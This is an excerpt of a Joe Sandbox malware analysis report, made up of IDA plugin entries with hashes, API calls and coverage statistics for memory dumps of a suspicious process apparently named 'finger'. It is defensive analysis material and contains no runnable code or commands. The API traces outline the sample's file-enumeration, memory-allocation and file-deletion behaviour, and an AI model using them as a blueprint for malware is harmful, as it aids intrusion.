                                                              • Instruction ID: 9aeca95fc6eea966c6af3190808e44f1d80aa36803d58e5230bb297310d15e39
                                                              • Opcode Fuzzy Hash: 563d975ca398593017bffa70d123415f38ac73c782ba5bf847ce9d60c81d691c
                                                              • Instruction Fuzzy Hash: 59811871D006699BDB31CF54CC54BEEBBB4AF58714F0441EAAA19BB290D7709E848FA0
                                                              APIs
                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 0155CFBD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: CallFilterFunc@8
                                                              • String ID: @$@4rw@4rw
                                                              • API String ID: 4062629308-2979693914
                                                              • Opcode ID: 9d6096ce58fde0d5c1c3332b1a3578b2fcc92fb771b40011372052557c13c146
                                                              • Instruction ID: 50ca93421b75053aac0ab0ef921e2d322dca5992136350db1f0449ca82d97822
                                                              • Opcode Fuzzy Hash: 9d6096ce58fde0d5c1c3332b1a3578b2fcc92fb771b40011372052557c13c146
                                                              • Instruction Fuzzy Hash: A9418B72900219DFDB219FA9C890AADBBF8FF64B50F00452FE915DF264E7748901CB61

                                                              Execution Graph

                                                              Execution Coverage:2.5%
                                                              Dynamic/Decrypted Code Coverage:4.3%
                                                              Signature Coverage:1.6%
                                                              Total number of Nodes:443
                                                              Total number of Limit Nodes:73

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 5Z$9$<$>$L$N$N$Pw$So$`$fN$j$m$n$X$s
                                                              • API String ID: 0-2357910541
                                                              • Opcode ID: 753580bf213d30355589e9630f1d4b18eaa8e9bb42518d70e4d75e0ea6cf0002
                                                              • Instruction ID: a67bdfb44f4425136238db4b7671cb89d1e37b5f69bc356b75deb45b18bdadb2
                                                              • Opcode Fuzzy Hash: 753580bf213d30355589e9630f1d4b18eaa8e9bb42518d70e4d75e0ea6cf0002
                                                              • Instruction Fuzzy Hash: D902CEB0D05229CFEB25CF98C898BEDBBB2BB44308F1081D9D44A7B281C7795A85CF55
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 0294C894
                                                              • FindNextFileW.KERNELBASE(?,00000010), ref: 0294C8CF
                                                              • FindClose.KERNELBASE(?), ref: 0294C8DA
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Find$File$CloseFirstNext
                                                              • String ID:
                                                              • API String ID: 3541575487-0
                                                              • Opcode ID: 74d106090a7080095cc7420a55ff87f1c068363cb79c4006443c16e485b3f75b
                                                              • Instruction ID: ca03acc90efd6b3c9559dbc033af9336c2a4282aff89b733e56e8da6c31e4297
                                                              • Opcode Fuzzy Hash: 74d106090a7080095cc7420a55ff87f1c068363cb79c4006443c16e485b3f75b
                                                              • Instruction Fuzzy Hash: D6318671A003087FDB21EFA0CC85FEF777DDF84744F144559B919A6190DB70AA848BA0
                                                              APIs
                                                              • NtCreateFile.NTDLL(161FBA40,?,?,?,?,?,?,?,?,?,?), ref: 02959438
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 913b0aa7505f0623b442c70bc7bed9716eb88d71eb565b98757f04a2e86dff34
                                                              • Instruction ID: 563f4675e3738080e23589bd23f653ac1bad75bcdd9ee0a0580abec48fb36433
                                                              • Opcode Fuzzy Hash: 913b0aa7505f0623b442c70bc7bed9716eb88d71eb565b98757f04a2e86dff34
                                                              • Instruction Fuzzy Hash: 8631B0B5A00648ABDB14DF99D880EEEB7F9EF88714F108219FD19A7340D734A951CFA4
                                                              APIs
                                                              • NtReadFile.NTDLL(161FBA40,?,?,?,?,?,?,?,?), ref: 02959580
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: e6f3ba0a2a121550311ff52ac0598f0ab7352921171cdb98717c8912cdbe003b
                                                              • Instruction ID: ec343083f077524a32a4471bd2844bee1a7d0b227209678ef8017ad06130532a
                                                              • Opcode Fuzzy Hash: e6f3ba0a2a121550311ff52ac0598f0ab7352921171cdb98717c8912cdbe003b
                                                              • Instruction Fuzzy Hash: 5131C2B5A00608ABDB14DF99D881EEFB7F9EF88714F108219FD19A7240D734A911CFA4
                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(161FBA40,?,029581AF,00000000,00000004,00003000,?,?,?,?,?,029581AF,02941F4E), ref: 02959855
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: a1c1bc1c7ed6e412f4197ea02707f05ce7fd928f0e11f28bcc27ba9ea0b3128d
                                                              • Instruction ID: 750b23b3d44de0a9ecd95733b9b99cac130f8eaede657ef943f47c37c6cecb0e
                                                              • Opcode Fuzzy Hash: a1c1bc1c7ed6e412f4197ea02707f05ce7fd928f0e11f28bcc27ba9ea0b3128d
                                                              • Instruction Fuzzy Hash: 752117B5A00618ABDB10DF99DC41EEFB7BAEF88700F108219FD19A7241D774A911CFA5
                                                              APIs
                                                              • NtDeleteFile.NTDLL(161FBA40), ref: 02959620
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DeleteFile
                                                              • String ID:
                                                              • API String ID: 4033686569-0
                                                              • Opcode ID: d7fd5be2052f01351cd39b10a120a2b64c712234ba1b204dfdc6d8a01e2bf1db
                                                              • Instruction ID: 51675f62b023e64be767ccd10da86d0f2241a8de624e956b39a73af391d07133
                                                              • Opcode Fuzzy Hash: d7fd5be2052f01351cd39b10a120a2b64c712234ba1b204dfdc6d8a01e2bf1db
                                                              • Instruction Fuzzy Hash: 6211CA71A00218ABDB20EB68CC41FAB77ADEB84710F108119FE08A7280D770AA058FE5
                                                              APIs
                                                              • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02959661
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 085c86df9dafaac33c1aaa89ff5402a964957b63bb21a493f7364fc0a86431e4
                                                              • Instruction ID: c515d6c6c7ba5898a2ee091b9e51ad0ef1ce5501ea44ec245cb6fb6fa845caf7
                                                              • Opcode Fuzzy Hash: 085c86df9dafaac33c1aaa89ff5402a964957b63bb21a493f7364fc0a86431e4
                                                              • Instruction Fuzzy Hash: E9E08C762002147BC620EA5ADC40FDBB7AEDFC6720F008015FA0CA7240CA70BA12CBF4
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 00cf68425afbdcaed81e6eb0fd3a69a28be2188fbd2081127e2604e0cc5a3d1c
                                                              • Instruction ID: 8ae7859e49be49a72125e0cd35491b089aacf0a49fe9df9f49ddde295a878e21
                                                              • Opcode Fuzzy Hash: 00cf68425afbdcaed81e6eb0fd3a69a28be2188fbd2081127e2604e0cc5a3d1c
                                                              • Instruction Fuzzy Hash: 66900235615814129140B1584884546401597E0301B55C011E1424554C8B148A965361
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 604097280ecee44ae760fb3b9d4e069ba1b95d0ddeaed764736ec27da8a6b3a4
                                                              • Instruction ID: af10dc0e1648d8dda5bd2ca4bf2a63b365c30ff3f95d85bcd779112ea1449873
                                                              • Opcode Fuzzy Hash: 604097280ecee44ae760fb3b9d4e069ba1b95d0ddeaed764736ec27da8a6b3a4
                                                              • Instruction Fuzzy Hash: E7900475711514434140F15C4C044077015D7F13013D5C115F1554570CC71CCDD5D37D
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: be32dfa56d30c3f420fd89ec5cc1aeedab87014bef5d2ad5ca23fe37e367ef13
                                                              • Instruction ID: 477e9216d6550ec3bb175b241ac2674decda09c0969ea79c40f84ee749e69e0d
                                                              • Opcode Fuzzy Hash: be32dfa56d30c3f420fd89ec5cc1aeedab87014bef5d2ad5ca23fe37e367ef13
                                                              • Instruction Fuzzy Hash: 4D900265212414034105B1584414616401A87E0201B55C021E2014590DC62589D16125
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 5e6dd69fb5db4cd0087f45042d7c00ce12245baf46d259a99196c6933553e77a
                                                              • Instruction ID: b944497c2ac361b8d3dae29828a13604f7f79170bb81f2bc9982a6c25cbffdf7
                                                              • Opcode Fuzzy Hash: 5e6dd69fb5db4cd0087f45042d7c00ce12245baf46d259a99196c6933553e77a
                                                              • Instruction Fuzzy Hash: F890043571541C03D150F15C44147470015C7D0301F55C011F1034754DC755CFD577F1
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: f0e4b363008d233613640516718de908853f606166341a9db1ad154f1ac005a1
                                                              • Instruction ID: 2b9249b79c5270e668d31b203b0dcb88f8cb9e8022bd070b989544eced49e117
                                                              • Opcode Fuzzy Hash: f0e4b363008d233613640516718de908853f606166341a9db1ad154f1ac005a1
                                                              • Instruction Fuzzy Hash: 4390023521545C42D140B1584404A46002587D0305F55C011A1064694D97258E95B661
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: e60c5edd05327f9a741c99cf4219836660d2b07b25739b11b8597d258ec96fe0
                                                              • Instruction ID: 2002594270649ea60cba57fe24682524861bc9e5304bce96fda60fe5e850ce38
                                                              • Opcode Fuzzy Hash: e60c5edd05327f9a741c99cf4219836660d2b07b25739b11b8597d258ec96fe0
                                                              • Instruction Fuzzy Hash: 3990023521141C02D180B158440464A001587D1301F95C015A1025654DCB158B9977A1
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 483d8d08dcc884aa7b2ea9de5487902550d219ad07acaa650dab5256e907d952
                                                              • Instruction ID: 4aa041df233e0283477c31b896e3148914c89d9dedc8a0f5884b536371326aab
                                                              • Opcode Fuzzy Hash: 483d8d08dcc884aa7b2ea9de5487902550d219ad07acaa650dab5256e907d952
                                                              • Instruction Fuzzy Hash: FE900229231414020145F558060450B045597D6351395C015F2416590CC72189A55321
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 5ae2e85e0c042f0054418d7e58552798f45228401970487a8a2632da805a24e8
                                                              • Instruction ID: ab87efea4485dfc199705ccf851009ffafc09bca01f757f34846777fc1abf054
                                                              • Opcode Fuzzy Hash: 5ae2e85e0c042f0054418d7e58552798f45228401970487a8a2632da805a24e8
                                                              • Instruction Fuzzy Hash: E890043D331414030105F55C07045070057C7D5351355C031F3015550CD731CDF15131
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4946484c548444c2a80a6b5cf29b078f353b3ca69d1e03384783d21c25f49530
                                                              • Instruction ID: 3f0b657a2463e81921aee61bcd4cb68efe001bf08b02c3d6dfcb387c4736c0b0
                                                              • Opcode Fuzzy Hash: 4946484c548444c2a80a6b5cf29b078f353b3ca69d1e03384783d21c25f49530
                                                              • Instruction Fuzzy Hash: CF90026535141842D100B1584414B060015C7E1301F55C015E2064554D8719CD926126
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 9936fe9ee8bc01859120f992c235dd66cc8618cd5eace7fd6f05dbac901347a9
                                                              • Instruction ID: 0499f5329f231d21c61179efc6bdbf3d2676c99cdc994fb43219c1329666a8bc
                                                              • Opcode Fuzzy Hash: 9936fe9ee8bc01859120f992c235dd66cc8618cd5eace7fd6f05dbac901347a9
                                                              • Instruction Fuzzy Hash: 07900225611414424140B16888449064015ABE1211755C121A1998550D865989A55665
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 5e5cc4d053382a120532333e0114cb14f2ae5c98e850d9b8abc344097028946e
                                                              • Instruction ID: a690e302b6ca4ffc36c28902edbe7d04e3703708f480cc5e460d567d9910e443
                                                              • Opcode Fuzzy Hash: 5e5cc4d053382a120532333e0114cb14f2ae5c98e850d9b8abc344097028946e
                                                              • Instruction Fuzzy Hash: F3900225221C1442D200B5684C14B07001587D0303F55C115A1154554CCA1589A15521
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: a306f25142da3369fb5c0aace62c10c936ef7abb441a2ca61b6ab9c83197dfd7
                                                              • Instruction ID: 64397727308088e09c81ad56c401e05d773adfd3a9ee482a1eb47ced0d3d8982
                                                              • Opcode Fuzzy Hash: a306f25142da3369fb5c0aace62c10c936ef7abb441a2ca61b6ab9c83197dfd7
                                                              • Instruction Fuzzy Hash: BE90022561141902D101B1584404616001A87D0241F95C022A2024555ECB258AD2A131
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 52f14384ef778a3809ff7cc8864951672cf26401c3f4ff439a72fa05e41e1f02
                                                              • Instruction ID: f7269772387fa3bd0531b57ecbad56f36624e1c1dc49091b913b0a74093dc665
                                                              • Opcode Fuzzy Hash: 52f14384ef778a3809ff7cc8864951672cf26401c3f4ff439a72fa05e41e1f02
                                                              • Instruction Fuzzy Hash: 1390026521181803D140B5584804607001587D0302F55C011A3064555E8B298D916135
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 29a97bf626962d85cf2ab9c567a3713e01aec514fee6e5b6211e824b218f7ecf
                                                              • Instruction ID: 2f1675733d133693df72ab1d2d4c045e017f21d82db2819293bfc6aa5f1b4a12
                                                              • Opcode Fuzzy Hash: 29a97bf626962d85cf2ab9c567a3713e01aec514fee6e5b6211e824b218f7ecf
                                                              • Instruction Fuzzy Hash: AC90043531141403D140F15C541C7074015D7F1301F55D011F1414554CDF15CDD75333
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 2fcf2705a8b209810c2256d502c3c58f0fdbee92512a8c80805e9b433218a915
                                                              • Instruction ID: db049098ca062a2bcea82e95d885c584bb1f4a45220b9e44f18c0651546df5d8
                                                              • Opcode Fuzzy Hash: 2fcf2705a8b209810c2256d502c3c58f0fdbee92512a8c80805e9b433218a915
                                                              • Instruction Fuzzy Hash: DA90022D22341402D180B158540860A001587D1202F95D415A1015558CCA1589A95321
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 488a5a47aeb77e117abc9f97850403e292b4e7ede5a821476d0f2606d6b9a57d
                                                              • Instruction ID: 64b40e384864c032cb6f457643331570379c66d6232a1bf80c70441574f871e9
                                                              • Opcode Fuzzy Hash: 488a5a47aeb77e117abc9f97850403e292b4e7ede5a821476d0f2606d6b9a57d
                                                              • Instruction Fuzzy Hash: B890023521141813D111B1584504707001987D0241F95C412A1424558D97568A92A121
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 1ad3abc69163c0611161d2d0fa9abf5097f50557bd233ee98351e5802ff1f4b1
                                                              • Instruction ID: 9dd91abac64a5027d659b903bd2392aa628466fcbd3e1a7a6c3d8d1a8bab5cb9
                                                              • Opcode Fuzzy Hash: 1ad3abc69163c0611161d2d0fa9abf5097f50557bd233ee98351e5802ff1f4b1
                                                              • Instruction Fuzzy Hash: 4B900225252455525545F1584404507401697E0241795C012A2414950C86269996D621
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 630a7d9e2b64581dfb262c2dfa5b3e2132f28835bac02b1392b75a2e8a339769
                                                              • Instruction ID: 799bd37726d86a0eceb6ff8e192d6455ddbee90f33ca842fdce9364804858ac2
                                                              • Opcode Fuzzy Hash: 630a7d9e2b64581dfb262c2dfa5b3e2132f28835bac02b1392b75a2e8a339769
